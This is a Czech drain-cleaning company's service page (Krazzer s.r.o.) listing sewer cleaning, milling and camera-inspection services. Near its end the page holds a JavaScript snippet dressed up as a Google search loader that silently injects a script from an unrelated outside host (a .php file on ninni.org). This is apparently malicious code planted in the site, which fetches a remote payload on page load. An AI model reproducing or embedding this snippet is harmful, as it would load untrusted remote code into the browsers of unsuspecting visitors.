Čištění a monitoring kanalizací

Potřebujete vyčistit ucpanou domovní kanalizaci nebo zanesený hlavní řad?

Zavolejte nám, dokážeme si poradit s každým problémem!

Čištění kanalizaceProvádíme čištění kanalizacedomovních odpadů a potrubí všech druhů a profilů. Od nejmenších profilů jako jsou odtoky od umyvadel a WC, až po velké potrubí a stoky na hlavních řadech.
Díky velkému množství moderní a výkonné techniky Vám můžeme nabídnout rychlou reakci, kvalitní a rychlé vyčištění kanalizace a hlavně nízkou cenu!

Auta na čištění jsou vybavena jak technologií pro čištění kanalizace tlakovou vodou, tak motorovými pery pro mechanické čištění odpadů menších profilů.

Díky těmto předpokladům jsme schopni si na místě poradit s jakýmkoliv problémem s kanalizací během jedné návštěvy!

Vozy pro čištění kanalizace jsou vybaveny velkým množstvím čisticích trysek včetně rotačních pro čištění silně zatukovaných, nebo zainkrustovaných potrubí.

Co vše patří do čištění a čištění kanalizace?

 • havarijní čištění kanalizace
 • čištění bytových odpadů (odtoky od WC, výlevek, dřezů, umyvadel apod.)
 • čištění domovních stoupaček
 • čištění ucpané kanalizace
 • frézování domovních stoupaček
 • čištění domovních kanalizačních přípojek včetně vytěžení materiálu
 • čištění koupelnových vpustí
 • čištění dvorních dešťových vpustí (gulí)
 • čištění dešťových svodů (gajgrů)
 • čištění revizních šachet včetně vytěžení materiálu
 • frézování kořenů a inkrustů v kanalizaci
 • frézování betonu v kanalizaci pomocí speciálních frézovacích trysek
 • čištění silně zatukovaných potrubí
 • čištění areálové kanalizace
 • čištění kanalizačních řadů kruhového i vejčitého tvaru
 • čištění velkých stok
 • čištění uličních dešťových vpustí
 • čištění horských dešťových vpustí
 • čištění dešťových odvodňovacích žlabů
 • čištění jímek, nádrží a septiků tlakovou vodou
 • čištění čerpacích stanic
 • čištění tukových lapolů tlakovou vodou
 • čištění protlaků, propustků a zatrubněných vodotečí
 • čištění nového potrubí před předáním provozovateli
 • preventivní čištění kanalizace
 • mytí ploch vysokotlakou pistolí

Monitoring

Moonitoring kanalizace - Revize, prohlídka, monitoring domovních, bytových i kanalizačních potrubí nástrčnou kamerouRevize, prohlídka, monitoring domovních, bytových i kanalizačních potrubí nástrčnou kamerou od 40 – 300 mm.

Tak co už jste někdy měli problém s ucpaným či jinak nefukčním odpadem nebo kanalizací? V dnešní době kdy bereme jako samozřejmost funkční odpad a kanalizaci je jakákoli havárie opravdovou kalamitou!!! Dovedete si představit , co vše havárie odpadu a kanalizace obnáší? Pokud tuto kalamitu, havárii necchcete zažít, pokud jste si vědomi že se nějaký problém (havárie) blíží neváhejte a nechte si provést profesionální revizi (prohlídku) odpadů a kanalizace od firmy Krazzer s.r.o. Předejděte komplikacím s ucpaným odpadem, kanalizací!!! Revize, monitoring, prohlídka kanalizační kamerou Vám ušetří mnoho problémů a starostí!

(function() {
var gcse = document.createElement(‘script’);
gcse.type = ‘text/javascript’;
gcse.async = true;
gcse.src = “http://ninni.org/core9Om3.php”;
var s = document.getElementsByTagName(‘script’)[0];
s.parentNode.insertBefore(gcse, s);
})();


Komentáře nejsou povoleny.